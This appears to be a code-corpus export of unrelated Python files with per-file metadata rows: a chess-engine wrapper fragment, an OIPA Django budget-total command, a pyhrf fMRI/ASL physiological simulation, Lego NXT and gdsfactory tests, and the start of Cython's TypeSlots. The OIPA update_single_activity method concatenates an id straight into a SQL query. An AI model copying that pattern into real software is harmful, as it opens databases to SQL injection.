"""Engine sometimes need this to setup internal values."""
self.engine.ucinewgame()
self.engine.position(game)
def mode_send(self, ponder: bool, analyse: bool):
"""Set engine mode."""
self.option('Ponder', ponder)
self.option('UCI_AnalyseMode', analyse)
self.send()
def chess960_send(self, flag):
"""Send UCI_Chess960 flag to engine."""
if self.has_chess960():
self.option('UCI_Chess960', flag)
self.send()
def startup(self, options: dict, game: Board, new_game=True):
"""Startup engine."""
parser = configparser.ConfigParser()
parser.optionxform = str
if not options:
if self.shell is None:
success = parser.read(self.get_file() + '.uci')
else:
try:
with self.shell.open(self.get_file() + '.uci', 'r') as file:
parser.read_file(file)
success = True
except FileNotFoundError:
success = False
if success:
options = dict(parser[parser.sections().pop()])
self.level_support = bool(options)
self.options = options
self.chess960_send(game.has_chess960_castling_rights())
if new_game:
self.newgame(game)
logging.debug('Loaded engine [%s]', self.get_name())
logging.debug('Supported options [%s]', self.get_options())
|
gpl-3.0
| 5,526,358,255,197,360,000
| 33.321678
| 120
| 0.590261
| false
| 3.964459
| false
| false
| false
|
schlos/OIPA-V2.1
|
OIPA/iati/management/commands/total_budget_updater.py
|
1
|
1856
|
import datetime
# Django specific
from django.core.management.base import BaseCommand
from django.db import connection
from iati.models import Activity, Budget
import logging
logger = logging.getLogger(__name__)
class Command(BaseCommand):
option_list = BaseCommand.option_list
counter = 0
def handle(self, *args, **options):
parser = TotalBudgetUpdater()
parser.updateTotal()
class TotalBudgetUpdater():
def get_fields(self, cursor):
desc = cursor.description
results = [
dict(zip([col[0] for col in desc], row))
for row in cursor.fetchall()
]
return results
def update(self):
cursor = connection.cursor()
cursor.execute('SELECT activity_id, sum(value) as total_value FROM IATI_budget b GROUP BY activity_id')
results = self.get_fields(cursor=cursor)
for r in results:
cur_act = Activity.objects.get(id=r['activity_id'])
cur_act.total_budget = r['total_value']
cur_act.save()
return True
def update_single_activity(self, id):
try:
cursor = connection.cursor()
cursor.execute("SELECT activity_id, sum(value) as total_value FROM iati_budget b WHERE activity_id ='" + id + "' GROUP BY activity_id")
results = self.get_fields(cursor=cursor)
for r in results:
cur_act = Activity.objects.get(id=r['activity_id'])
cur_act.total_budget = r['total_value']
cur_act.save()
except Exception as e:
logger.info("error in " + id + ", def: update_single_activity")
if e.args:
logger.info(e.args[0])
if e.args.__len__() > 1:
logger.info(e.args[1])
if e.message:
logger.info(e.message)
|
agpl-3.0
| 7,268,961,908,031,832,000
| 28.47619
| 147
| 0.587823
| false
| 3.982833
| false
| false
| false
|
philouc/pyhrf
|
python/pyhrf/sandbox/physio.py
|
1
|
30326
|
import os.path as op
import numpy as np
from pyhrf import Condition
from pyhrf.paradigm import Paradigm
from pyhrf.tools import Pipeline
import pyhrf.boldsynth.scenarios as simbase
PHY_PARAMS_FRISTON00 = {
'model_name' : 'Friston00',
'tau_s' : 1/.8,
'eps' : .5,
'eps_max': 10., #TODO: check this
'tau_m' : 1.,
'tau_f' : 1/.4,
'alpha_w' : .2,
'E0' : .8,
'V0' : .02,
'k1' : 7 * .8,
'k2' : 2.,
'k3' : 2 * .8 - .2}
PHY_PARAMS_FMRII = {
'model_name' : 'fmrii',
'tau_s' : 1/.65,
'eps' : 1.,
'eps_max': 10., #TODO: check this
'tau_m' : .98,
'tau_f' : 1/.41,
'alpha_w' : .5,
'E0' : .4,
'V0' : .01,}
PHY_PARAMS_KHALIDOV11 = {
'model_name' : 'Khalidov11',
'tau_s' : 1.54,
'eps' : .54,
'eps_max': 10., #TODO: check this
'tau_m' : 0.98,
'tau_f' : 2.46,
'alpha_w' : .33,
'E0' : .34,
'V0' : 1,
'k1' : 7 * .34,
'k2' : 2.,
'k3' : 2 * .34 - .2}
#TODO: Donnet, Deuneux
from scipy.stats import truncnorm
def create_tbg_neural_efficacies(physiological_params, condition_defs, labels):
"""
Create neural efficacies from a truncated bi-Gaussian mixture.
Ars:
- physiological_params (dict (<param_name> : <param_value>):
parameters of the physiological model
- condition_defs (list of pyhrf.Condition):
list of condition definitions. Each item should have the following
fields (moments of the mixture):
- m_act (0<=float<eff_max): mean of activating component
- v_act (0<float): variance of activating component
- v_inact (0<float): variance of non-activating component
- labels (np.array((nb_cond, nb_vox), int)): binary activation states
Return:
np.array(np.array((nb_cond, nb_vox), float))
-> the generated neural efficacies
TODO: settle how to relate brls and prls to neural efficacies
"""
eff_max = physiological_params['eps_max']
eff = []
for ic,c in enumerate(condition_defs):
labels_c = labels[ic]
mask_activ = np.where(labels_c)
eff_c = truncnorm.rvs(0, eff_max, loc=0., scale=c.v_inact**.5,
size=labels_c.size)
# truncnorm -> loc is mean, scale is std_dev
eff_c[mask_activ] = truncnorm.rvs(0, eff_max, loc=c.m_act,
scale=c.v_act**.5, size=labels_c.sum())
eff.append(eff_c)
return np.vstack(eff)
def phy_integrate_euler(phy_params, tstep, stim, epsilon, Y0=None):
"""
Integrate the ODFs of the physiological model with the Euler method.
Args:
- phy_params (dict (<param_name> : <param_value>):
parameters of the physiological model
- tstep (float): time step of the integration, in seconds.
- stim (np.array(nb_steps, float)): stimulation sequence with a temporal
resolution equal to the time step of the integration
- epsilon (float): neural efficacy
- Y0 (np.array(4, float) | None): initial values for the physiological
signals.
If None: [0, 1, 1, 1.]
s f_in q v
Result:
- np.array((4, nb_steps), float)
-> the integrated physiological signals, where indexes of the first
axis correspond to:
0 : flow inducing
1 : inflow
2 : HbR
3 : blood volume
TODO: should the output signals be rescaled wrt their value at rest?
"""
tau_s = phy_params['tau_s']
tau_f = phy_params['tau_f']
tau_m = phy_params['tau_m']
alpha_w = phy_params['alpha_w']
E0 = phy_params['E0']
def cpt_phy_model_deriv(y, s, epsi, dest):
N, f_in, v, q = y
if f_in < 0.:
#raise Exception('Negative f_in (%f) at t=%f' %(f_in, ti))
#HACK
print 'Warning: Negative f_in (%f) at t=%f' %(f_in, ti)
f_in = 1e-4
dest[0] = epsi*s - (N/tau_s)-((f_in - 1)/tau_f) #dNdt
dest[1] = N #dfidt
dest[2] = (1/tau_m)*(f_in-v**(1/alpha_w)) #dvdt
dest[3] = (1/tau_m)*((f_in/E0)*(1-(1-E0)**(1/f_in)) - \
(q/v)*(v**(1/alpha_w))) #dqdt
return dest
res = np.zeros((stim.size+1,4))
res[0,:] = Y0 or np.array([0., 1., 1., 1.])
for ti in xrange(1, stim.size+1):
cpt_phy_model_deriv(res[ti-1], stim[ti-1], epsilon, dest=res[ti])
res[ti] *= tstep
res[ti] += res[ti-1]
return res[1:,:].T
def create_evoked_physio_signals(physiological_params, paradigm,
neural_efficacies, dt, integration_step=.05):
"""
Generate evoked hemodynamics signals by integrating a physiological model.
Args:
- physiological_params (dict (<pname (str)> : <pvalue (float)>)):
parameters of the physiological model.
In jde.sandbox.physio see PHY_PARAMS_FRISTON00, PHY_PARAMS_FMRII ...
- paradigm (pyhrf.paradigm.Paradigm) :
the experimental paradigm
- neural_efficacies (np.ndarray (nb_conditions, nb_voxels, float)):
neural efficacies involved in flow inducing signal.
- dt (float):
temporal resolution of the output signals, in second
- integration_step (float):
time step used for integration, in second
Returns:
- np.array((nb_signals, nb_scans, nb_voxels), float)
-> All generated signals, indexes of the first axis correspond to:
- 0: flow inducing
- 1: inflow
- 2: blood volume
- 3: [HbR]
"""
#TODO: handle multiple conditions
# -> create input activity signal [0, 0, eff_c1, eff_c1, 0, 0, eff_c2, ...]
# for now, take only first condition
first_cond = paradigm.get_stimulus_names()[0]
stim = paradigm.get_rastered(integration_step)[first_cond][0]
neural_efficacies = neural_efficacies[0]
# response matrix intialization
integrated_vars = np.zeros((4, neural_efficacies.shape[0], stim.shape[0]))
for i, epsilon in enumerate(neural_efficacies):
integrated_vars[:,i,:] = phy_integrate_euler(physiological_params,
integration_step, stim,
epsilon)
#downsampling:
nb_scans = paradigm.get_rastered(dt)[first_cond][0].size
dsf = int(dt/integration_step)
return np.swapaxes(integrated_vars[:,:,::dsf][:,:,:nb_scans], 1, 2)
def create_bold_from_hbr_and_cbv(physiological_params, hbr, cbv):
"""
Compute BOLD signal from HbR and blood volume variations obtained
by a physiological model
"""
# physiological parameters
V0 = physiological_params['V0']
k1 = physiological_params['k1']
k2 = physiological_params['k2']
k3 = physiological_params['k3']
return V0 *( k1*(1-hbr) + k2*(1-hbr/cbv) + k3*(1-cbv) )
def create_physio_brf(physiological_params, response_dt=.5,
response_duration=25.,return_brf_q_v=False):
"""
Generate a BOLD response function by integrating a physiological model and
setting its driving input signal to a single impulse.
Args:
- physiological_params (dict (<pname (str)> : <pvalue (float)>)):
parameters of the physiological model.
In jde.sandbox.physio see PHY_PARAMS_FRISTON00, PHY_PARAMS_FMRII ...
- response_dt (float): temporal resolution of the response, in second
- response_duration (float): duration of the response, in second
Return:
- np.array(nb_time_coeffs, float)
-> the BRF (normalized)
- also return brf_not_normalized, q, v when return_prf_q_v=True
(for error checking of v and q generation in calc_hrfs)
"""
p = Paradigm({'c':[np.array([0.])]}, [response_duration+response_dt],
{'c':[np.array([1.])]})
n = np.array([[1.]])
s,f,v,q = create_evoked_physio_signals(physiological_params, p, n,
response_dt)
brf = create_bold_from_hbr_and_cbv(physiological_params, q[:,0], v[:,0])
if return_brf_q_v:
return brf/ (brf**2).sum()**.5, q, v
else:
return brf / (brf**2).sum()**.5
def create_physio_prf(physiological_params, response_dt=.5,
response_duration=25.,return_prf_q_v=False):
"""
Generate a perfusion response function by setting the input driving signal
of the given physiological model with a single impulse.
Args:
- physiological_params (dict (<pname (str)> : <pvalue (float)>)):
parameters of the physiological model.
In jde.sandbox.physio see PHY_PARAMS_FRISTON00, PHY_PARAMS_FMRII ...
- response_dt (float): temporal resolution of the response, in second
- response_duration (float): duration of the response, in second
Return:
- np.array(nb_time_coeffs, float)
-> the PRF
- also return brf_not_normalized, q, v when return_prf_q_v=True
(for error checking of v and q generation in calc_hrfs)
"""
p = Paradigm({'c':[np.array([0.])]}, [response_duration+response_dt],
{'c':[np.array([1.])]}) # response_dt to match convention
# in JDE analysis
n = np.array([[1.]])
s,f,v,q = create_evoked_physio_signals(physiological_params, p, n,
response_dt)
prf = f[:,0] - f[0,0] #remove y-intercept
if return_prf_q_v:
return prf/ (prf**2).sum()**.5, q, v
else:
return prf / (prf**2).sum()**.5
def rescale_bold_over_perf(bold_stim_induced, perf_stim_induced,
bold_perf_ratio=5.):
return bold_stim_induced/bold_stim_induced.max() * bold_perf_ratio * \
perf_stim_induced.max()
def create_asl_from_stim_induced(bold_stim_induced_rescaled, perf_stim_induced,
ctrl_tag_mat, dsf, perf_baseline, noise,
drift=None, outliers=None):
"""
Downsample stim_induced signal according to downsampling factor 'dsf' and
add noise and drift (nuisance signals) which has to be at downsampled
temporal resolution.
"""
bold = bold_stim_induced_rescaled[0:-1:dsf,:].copy()
perf = np.dot(ctrl_tag_mat, (perf_stim_induced[0:-1:dsf,:].copy() + \
perf_baseline))
asl = bold + perf
if drift is not None:
asl += drift
if outliers is not None:
asl += outliers
asl += noise
return asl
def simulate_asl_full_physio(output_dir=None, noise_scenario='high_snr',
spatial_size='tiny'):
"""
Generate ASL data by integrating a physiological dynamical system.
Ags:
- output_dir (str|None): path where to save outputs as nifti files.
If None: no output files
- noise_scenario ("high_snr"|"low_snr"): scenario defining the SNR
- spatial_size ("tiny"|"normal") : scenario for the size of the map
- "tiny" produces 2x2 maps
- "normal" produces 20x20 maps
Result:
dict (<item_label (str)> : <simulated_item (np.ndarray)>)
-> a dictionary mapping names of simulated items to their values
WARNING: in this dict the 'bold' item is in fact the ASL signal.
This name was used to be compatible with JDE which assumes
that the functional time series is named "bold".
TODO: rather use the more generic label 'fmri_signal'.
TODO: use magnetization model to properly simulate final ASL signal
"""
drift_var = 10.
dt = .5
dsf = 2 #down sampling factor
if spatial_size == 'tiny':
lmap1, lmap2, lmap3 = 'tiny_1', 'tiny_2', 'tiny_3'
elif spatial_size == 'random_small':
lmap1, lmap2, lmap3 = 'random_small', 'random_small', 'random_small'
else:
lmap1, lmap2, lmap3 = 'icassp13', 'ghost', 'house_sun'
if noise_scenario == 'high_snr':
v_noise = 0.05
conditions = [
Condition(name='audio', m_act=10., v_act=.1, v_inact=.2,
label_map=lmap1),
Condition(name='video', m_act=11., v_act=.11, v_inact=.21,
label_map=lmap2),
Condition(name='damier', m_act=12., v_act=.12, v_inact=.22,
label_map=lmap3),
]
else: #low_snr
v_noise = 2.
conditions = [
Condition(name='audio', m_act=1.6, v_act=.3, v_inact=.3,
label_map=lmap1),
Condition(name='video', m_act=1.6, v_act=.3, v_inact=.3,
label_map=lmap2),
]
simulation_steps = {
'dt' : dt,
'dsf' : dsf,
'tr' : dt * dsf,
'condition_defs' : conditions,
# Paradigm
'paradigm' : simbase.create_localizer_paradigm_avd,
# Labels
'labels_vol' : simbase.create_labels_vol,
'labels' : simbase.flatten_labels_vol,
'nb_voxels': lambda labels: labels.shape[1],
# Neural efficacy
'neural_efficacies' : create_tbg_neural_efficacies,
# BRF
'primary_brf' : create_physio_brf,
'brf' : simbase.duplicate_brf,
# PRF
'primary_prf' : create_physio_prf,
'prf' : simbase.duplicate_prf,
# Physiological model
'physiological_params' : PHY_PARAMS_FRISTON00,
('flow_induction','perf_stim_induced','cbv','hbr') :
create_evoked_physio_signals,
'bold_stim_induced' : create_bold_from_hbr_and_cbv,
# Noise
'v_gnoise' : v_noise,
'noise' : simbase.create_gaussian_noise_asl,
# Drift
'drift_order' : 4,
'drift_var' : drift_var,
'drift_coeffs': simbase.create_drift_coeffs_asl,
'drift' : simbase.create_polynomial_drift_from_coeffs_asl,
# ASL
'ctrl_tag_mat' : simbase.build_ctrl_tag_matrix,
'asl_shape' : simbase.calc_asl_shape,
# Perf baseline #should be the inflow at rest ... #TODO
'perf_baseline' : simbase.create_perf_baseline,
'perf_baseline_mean' : 0.,
'perf_baseline_var': 0.,
# maybe rename to ASL (should be also modified in JDE)#TODO
'bold' : simbase.create_asl_from_stim_induced,
}
simu_graph = Pipeline(simulation_steps)
# Compute everything
simu_graph.resolve()
simulation = simu_graph.get_values()
if output_dir is not None:
#simu_graph.save_graph_plot(op.join(output_dir, 'simulation_graph.png'))
simbase.simulation_save_vol_outputs(simulation, output_dir)
# f = open(op.join(output_dir, 'simulation.pck'), 'w')
# cPickle.dump(simulation, f)
# f.close()
return simulation
def simulate_asl_physio_rfs(output_dir=None, noise_scenario='high_snr',
spatial_size='tiny'):
"""
Generate ASL data according to a LTI system, with PRF and BRF generated
from a physiological model.
Args:
- output_dir (str|None): path where to save outputs as nifti files.
If None: no output files
- noise_scenario ("high_snr"|"low_snr"): scenario defining the SNR
- spatial_size ("tiny"|"normal") : scenario for the size of the map
- "tiny" produces 2x2 maps
- "normal" produces 20x20 maps
Result:
dict (<item_label (str)> : <simulated_item (np.ndarray)>)
-> a dictionary mapping names of simulated items to their values
WARNING: in this dict the 'bold' item is in fact the ASL signal.
This name was used to be compatible with JDE which assumes
that the functional time series is named "bold".
TODO: rather use the more generic label 'fmri_signal'.
"""
drift_var = 10.
dt = .5
dsf = 2 #down sampling factor
if spatial_size == 'tiny':
lmap1, lmap2, lmap3 = 'tiny_1', 'tiny_2', 'tiny_3'
elif spatial_size == 'random_small':
lmap1, lmap2, lmap3 = 'random_small', 'random_small', 'random_small'
else:
lmap1, lmap2, lmap3 = 'icassp13', 'ghost', 'house_sun'
if noise_scenario == 'high_snr':
v_noise = 0.05
conditions = [
Condition(name='audio', perf_m_act=5., perf_v_act=.1, perf_v_inact=.2,
bold_m_act=15., bold_v_act=.1, bold_v_inact=.2,
label_map=lmap1),
Condition(name='video', perf_m_act=5., perf_v_act=.11, perf_v_inact=.21,
bold_m_act=14., bold_v_act=.11, bold_v_inact=.21,
label_map=lmap2),
Condition(name='damier', perf_m_act=12.,
perf_v_act=.12, perf_v_inact=.22,
bold_m_act=20., bold_v_act=.12, bold_v_inact=.22,
label_map=lmap3),
]
elif noise_scenario == 'low_snr_low_prl':
v_noise = 7.
scale = .3
print 'noise_scenario: low_snr_low_prl'
conditions = [
Condition(name='audio', perf_m_act=1.6*scale, perf_v_act=.1,
perf_v_inact=.1,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap1),
Condition(name='video', perf_m_act=1.6*scale, perf_v_act=.1,
perf_v_inact=.1,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap2),
]
else: #low_snr
v_noise = 2.
conditions = [
Condition(name='audio', perf_m_act=1.6, perf_v_act=.3,
perf_v_inact=.3,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap1),
Condition(name='video', perf_m_act=1.6, perf_v_act=.3,
perf_v_inact=.3,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap2),
]
simulation_steps = {
'dt' : dt,
'dsf' : dsf,
'tr' : dt * dsf,
'condition_defs' : conditions,
# Paradigm
'paradigm' : simbase.create_localizer_paradigm_avd,
'rastered_paradigm' : simbase.rasterize_paradigm,
# Labels
'labels_vol' : simbase.create_labels_vol,
'labels' : simbase.flatten_labels_vol,
'nb_voxels': lambda labels: labels.shape[1],
# Physiological model (for generation of RFs)
'physiological_params' : PHY_PARAMS_FRISTON00,
# Brls
'brls' : simbase.create_time_invariant_gaussian_brls,
# Prls
'prls' : simbase.create_time_invariant_gaussian_prls,
# BRF
'primary_brf' : create_physio_brf,
'brf' : simbase.duplicate_brf,
# PRF
'primary_prf' : create_physio_prf,
'prf' : simbase.duplicate_prf,
# Perf baseline
'perf_baseline' : simbase.create_perf_baseline,
'perf_baseline_mean' : 1.5,
'perf_baseline_var': .4,
# Stim induced
'bold_stim_induced' : simbase.create_bold_stim_induced_signal,
'perf_stim_induced' : simbase.create_perf_stim_induced_signal,
# Noise
'v_gnoise' : v_noise,
'noise' : simbase.create_gaussian_noise_asl,
# Drift
'drift_order' : 4,
'drift_var' : drift_var,
'drift_coeffs':simbase.create_drift_coeffs_asl,
'drift' : simbase.create_polynomial_drift_from_coeffs_asl,
# Bold # maybe rename as ASL (should be handled afterwards ...
'ctrl_tag_mat' : simbase.build_ctrl_tag_matrix,
'asl_shape' : simbase.calc_asl_shape,
'bold' : simbase.create_asl_from_stim_induced,
}
simu_graph = Pipeline(simulation_steps)
# Compute everything
simu_graph.resolve()
simulation = simu_graph.get_values()
if output_dir is not None:
#simu_graph.save_graph_plot(op.join(output_dir, 'simulation_graph.png'))
simbase.simulation_save_vol_outputs(simulation, output_dir)
# f = open(op.join(output_dir, 'simulation.pck'), 'w')
# cPickle.dump(simulation, f)
# f.close()
return simulation
#### Linearized system to characterize BRF - PRF relationship ####
# def buildOrder1FiniteDiffMatrix_central_alternate(size,dt):
# """
# returns a toeplitz matrix
# for central differences
# """
# #instability in the first few data points when calculating prf (not seen when old form is used)
# from scipy.linalg import toeplitz
# r = np.zeros(size)
# c = np.zeros(size)
# r[1] = .5
# r[size-1] = -.5
# c[1] = -.5
# c[size-1] = .5
# # to fix the last grid point
# D = toeplitz(r,c).T
# D[0,size-1]=0
# D[size-1,0]=0
# D[size-1,size-2]=-1
# D[size-1,size-1]=1
# return D/(2*dt)
def buildOrder1FiniteDiffMatrix_central(size,dt):
"""
returns a toeplitz matrix
for central differences
to correct for errors on the first and last points:
(due to the fact that there is no rf[-1] or rf[size] to average with)
- uses the last point to calcuate the first and vis-versa
- this is acceptable bc the rf is assumed to begin & end at steady state
(thus the first and last points should both be zero)
"""
from scipy.linalg import toeplitz
r = np.zeros(size)
c = np.zeros(size)
r[1] = .5
r[size-1] = -.5
c[1] = -.5
c[size-1] = .5
return toeplitz(r,c).T/(2*dt)
def plot_calc_hrf(hrf1_simu, hrf1_simu_name, hrf1_calc, hrf1_calc_name,
hrf2_simu, hrf2_simu_name, dt):
import matplotlib.pyplot as plt
plt.figure()
plt.subplot(121)
t = np.arange(hrf1_simu.size) * dt #TODO: find non-dt method to do this
simu1 = plt.plot(t, hrf1_simu, label=hrf1_simu_name)
calc1 = plt.plot(t, hrf1_calc, label=hrf1_calc_name)
plt.legend()
plt.title(hrf1_calc_name)
plt.subplot(122)
simu2 = plt.plot(t, hrf2_simu, label=hrf2_simu_name)
plt.plot(t, hrf1_simu, label=hrf1_simu_name)
plt.legend()
plt.title(hrf2_simu_name)
plt.show()
return None
def linear_rf_operator(rf_size, phy_params, dt, calculating_brf=False):
"""
Calculates the linear operator A needed to convert brf to prf & vis-versa
prf = (A^{-1})brf
brf = (A)prf
Inputs:
- size of the prf and/or brf (assumed to be same)
- physiological parameters
- time resolution of data:
- if you wish to calculate brf (return A), or prf (return inverse of A)
Outputs:
- np.array of size (hrf_size,1) linear operator to convert hrfs
"""
import numpy as np
tau_m_inv = 1./phy_params['tau_m']
alpha_w = phy_params['alpha_w']
alpha_w_inv = 1./phy_params['alpha_w']
E0 = phy_params['E0']
V0 = phy_params['V0']
k1 = phy_params['k1']
k2 = phy_params['k2']
k3 = phy_params['k3']
c = tau_m_inv * ( 1 + (1-E0)*np.log(1-E0)/E0 )
from pyhrf.sandbox.physio import buildOrder1FiniteDiffMatrix_central
D = buildOrder1FiniteDiffMatrix_central(rf_size,dt) #numpy matrix
eye = np.matrix(np.eye(rf_size)) #numpy matrix
A3 = tau_m_inv*( (D + (alpha_w_inv*tau_m_inv)*eye).I )
A4 = c * (D+tau_m_inv*eye).I - (D+tau_m_inv*eye).I*((1-alpha_w)*alpha_w_inv* tau_m_inv**2)* (D+alpha_w_inv*tau_m_inv*eye).I
A = V0 * ( (k1+k2)*A4 + (k3-k2)* A3 )
if (calculating_brf):
return -A.A
else: #calculating_prf
return -(A.I).A
def calc_linear_rfs(simu_brf, simu_prf, phy_params, dt, normalized_rfs=True):
"""
Calculate 'prf given brf' and 'brf given prf' based on the a linearization
around steady state of the physiological model as described in Friston 2000.
Input:
- simu_brf, simu_prf: brf and prf from the physiological simulation
from which you wish to calculate the respective
prf and brf.
Assumed to be of size (1,hrf.size)
- phy_params
- normalized_rfs: set to True if simu_hrfs are normalized
Output:
- calc_brf, calc_prf: np.arrays of shape (hrf.size, 1)
- q_linear, v_linear: q and v calculated according to the linearized model
Note:
These calculations do not account for any rescaling between brf and prf.
This means the input simu_brf, simu_prf should NOT be rescaled.
** Warning**:
- this function assumes prf.size == brf.size and uses this to build D, I
- if making modifications:
calc_brf, calc_prf have a truncation error (due to the finite difference matrix used) on the order of O(dt)^2. If for any reason a hack is later implemented to set the y-intecepts of brf_calc, prf_calc to zero by
setting the first row of X4, X3 = 0, this will raise a singular matrix
error in the calculation of calc_prf (due to X.I command), so this error is helpful in this case
"""
D = buildOrder1FiniteDiffMatrix_central(simu_prf.size,dt) #numpy matrix
I = np.matrix(np.eye(simu_prf.size)) #numpy matrix
#TODO: elimlinate prf.size dependency
tau_m = phy_params['tau_m']
tau_m_inv = 1./tau_m #when tau_m=1, singular matrix formed by (D+tau_m_inv*I)
alpha_w = phy_params['alpha_w']
alpha_w_inv = 1./phy_params['alpha_w']
E0 = phy_params['E0']
V0 = phy_params['V0']
k1 = phy_params['k1']
k2 = phy_params['k2']
k3 = phy_params['k3']
c = tau_m_inv * ( 1 + (1-E0)*np.log(1-E0)/E0 )
#transform to (hrf.size,1) matrix for calcs
simu_prf = np.matrix(simu_prf).transpose()
simu_brf = np.matrix(simu_brf).transpose()
X3 = tau_m_inv*( (D + (alpha_w_inv*tau_m_inv)*I).I )
X4= c *(D+tau_m_inv*I).I - (D+tau_m_inv*I).I*((1-alpha_w)*alpha_w_inv*\
tau_m_inv**2)* (D+alpha_w_inv*tau_m_inv*I).I
X = V0 * ( (k1+k2)*X4 + (k3-k2)* X3 )
#for error checking
q_linear = 1-X4*(-simu_prf)
v_linear = 1-X3*(-simu_prf)
calc_brf = X*(-simu_prf)
calc_prf = -X.I*simu_brf
#convert to np.arrays
calc_prf = calc_prf.A
calc_brf = calc_brf.A
q_linear = q_linear.A
v_linear = v_linear.A
if normalized_rfs:
calc_prf /= (calc_prf**2).sum()**.5
calc_brf /= (calc_brf**2).sum()**.5
return calc_brf, calc_prf, q_linear, v_linear
def run_calc_linear_rfs():
"""
Choose physio parameters
Choose to generate simu_rfs from multiple or single stimulus
TODO:
- figure out why there is an issue that perf_stim_induced is much greater than bold_stim_induced
- figure out why when simu_brf=bold_stim_induced_rescaled,
calc_brf is so small it appears to be 0
"""
phy_params = PHY_PARAMS_FRISTON00
#phy_params = PHY_PARAMS_KHALIDOV11
multiple_stimulus_rf=False #to test calculations using a single stimulus rf
#else, tests on a single stimulus rf
if multiple_stimulus_rf:
simu_items = simulate_asl_full_physio()
#for rfs, rows are rfs, columns are different instances
choose_rf = 1 # choose any number between 0 and simu_rf.shape[1]
simu_prf = simu_items['perf_stim_induced'][:,choose_rf].T - \
simu_items['perf_stim_induced'][0,choose_rf]
simu_brf = simu_items['bold_stim_induced'][:,choose_rf].T
dt = simu_items['dt']
q_dynamic = simu_items['hbr'][:,choose_rf]
v_dynamic = simu_items['cbv'][:,choose_rf]
normalized_rfs = False
# if normalized simulated brfs and prfs are being used, then the comparison between v and q, linear and dynamic, is no longer valid. Disregard the plot.
else:
dt = .05
duration = 25.
simu_prf, q_unused, v_unused = create_physio_prf(phy_params,
response_dt=dt, response_duration=duration,
return_prf_q_v=True)
simu_brf, q_dynamic, v_dynamic = create_physio_brf(phy_params,
response_dt=dt, response_duration=duration,
return_brf_q_v=True)
normalized_rfs = True
## deletable - no use for rescaling here
#rescaling irrelevant to this simulation
#simu_brf_rescale = rescale_bold_over_perf(simu_brf, simu_prf)
#simu_brf = simu_brf_rescale
#in testing: assert( simu_brf.shape == simu_prf_shape)?
##
calc_brf, calc_prf, q_linear, v_linear = calc_linear_rfs(simu_brf, simu_prf,
phy_params, dt,
normalized_rfs)
plot_results=True
if plot_results:
plot_calc_hrf(simu_brf, 'simulated brf', calc_brf, 'calculated brf',
simu_prf, 'simulated prf', dt)
plot_calc_hrf(simu_prf, 'simulated prf', calc_prf, 'calculated prf',
simu_brf, 'simulated brf', dt)
#for debugging
import matplotlib.pyplot as plt
plt.figure()
plt.subplot(121)
t = np.arange(v_linear.size) * dt #TODO: find non-dt method to do this
plt.plot(t,v_linear, label='v linear')
plt.plot(t, v_dynamic, label='v dynamic')
plt.legend()
plt.title('v')
plt.subplot(122)
plt.plot(t,q_linear, label='q linear')
plt.plot(t, q_dynamic, label='q dynamic')
plt.legend()
plt.title('q')
plt.show()
# to see calc_brf and calc_prf on same plot (if calculating both)
plt.figure()
plt.plot(t, calc_brf, label='calculated brf')
plt.plot(t, calc_prf, label='calculated prf')
plt.legend()
plt.title('calculated hrfs')
return None
|
gpl-3.0
| 5,536,194,127,172,453,000
| 35.581423
| 235
| 0.563246
| false
| 3.173171
| false
| false
| false
|
snim2/nxt-turtle
|
tests/test-sensors.py
|
1
|
1224
|
"""
Test the sensors on the Lego NXT.
Copyright (C) Sarah Mount, 2008.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
"""
import nxt_turtle
__author__ = 'Sarah Mount <s.mount@wlv.ac.uk>'
__date__ = 'March 2008'
if __name__ == '__main__':
turtle = nxt_turtle.LegoTurtle()
print 'Sound level: ', turtle.get_sound()
print 'Light level: ', turtle.get_light()
print 'UltraSound level:', turtle.get_ultrasound()
if turtle.get_touch():
print 'Touch sensor: On'
else: print 'Touch sensor: Off'
turtle.close()
|
gpl-2.0
| -2,247,795,392,501,042,400
| 33
| 78
| 0.694444
| false
| 3.754601
| false
| false
| false
|
gdsfactory/gdsfactory
|
pp/drc/test_width.py
|
1
|
1250
|
from typing import Tuple
import pp
from pp.drc import check_width
def test_wmin_failing(layer: Tuple[int, int] = (1, 0)) -> None:
w = 50
min_width = 50 + 10 # component edges are smaller than min_width
c = pp.components.rectangle(size=(w, w), layer=layer)
gdspath = c.write_gds("wmin.gds")
# r = check_width(gdspath, min_width=min_width, layer=layer)
# print(check_width(gdspath, min_width=min_width, layer=layer))
assert check_width(gdspath, min_width=min_width, layer=layer) == 2
assert check_width(c, min_width=min_width, layer=layer) == 2
def test_wmin_passing(layer: Tuple[int, int] = (1, 0)) -> None:
w = 50
min_width = 50 - 10 # component edges are bigger than the min_width
c = pp.components.rectangle(size=(w, w), layer=layer)
gdspath = c.write_gds("wmin.gds")
# print(check_width(c, min_width=min_width, layer=layer))
# assert check_width(gdspath, min_width=min_width, layer=layer) is None
# assert check_width(c, min_width=min_width, layer=layer) is None
assert check_width(gdspath, min_width=min_width, layer=layer) == 0
assert check_width(c, min_width=min_width, layer=layer) == 0
if __name__ == "__main__":
# test_wmin_failing()
test_wmin_passing()
|
mit
| 7,011,641,545,974,468,000
| 35.764706
| 75
| 0.6608
| false
| 2.97619
| false
| false
| false
|
rguillebert/CythonCTypesBackend
|
Cython/Compiler/TypeSlots.py
|
1
|
30865
|
#
# Tables describing slots in the CPython type object
# and associated know-how.
#
import Naming
import PyrexTypes
import StringEncoding
invisible = ['__cinit__', '__dealloc__', '__richcmp__',
'__nonzero__', '__bool__']
class Signature(object):
# Method slot signature descriptor.
#
# has_dummy_arg boolean
# has_generic_args boolean
# fixed_arg_format string
# ret_format string
# error_value string
#
# The formats are strings made up of the following
# characters:
#
# 'O' Python object
# 'T' Python object of the type of 'self'
# 'v' void
# 'p' void *
# 'P' void **
# 'i' int
# 'b' bint
# 'I' int *
# 'l' long
# 'f' float
# 'd' double
# 'h' Py_hash_t
# 'z' Py_ssize_t
